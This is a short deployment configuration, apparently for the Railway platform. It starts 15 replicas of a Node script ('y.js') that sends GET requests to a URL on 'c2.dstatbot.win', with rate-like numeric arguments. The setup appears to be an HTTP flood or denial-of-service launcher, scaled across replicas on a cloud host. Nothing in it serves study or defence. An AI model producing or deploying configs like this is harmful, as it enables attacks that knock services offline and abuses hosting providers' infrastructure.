[build]
builder = "NIXPACKS"

[deploy]
replicas = 15
startCommand = "node y.js GET https://c2.dstatbot.win/r9wNvHj1 700 32 100 --full --debug "
restartPolicyType = "ON_FAILURE"
restartPolicyMaxRetries = 1
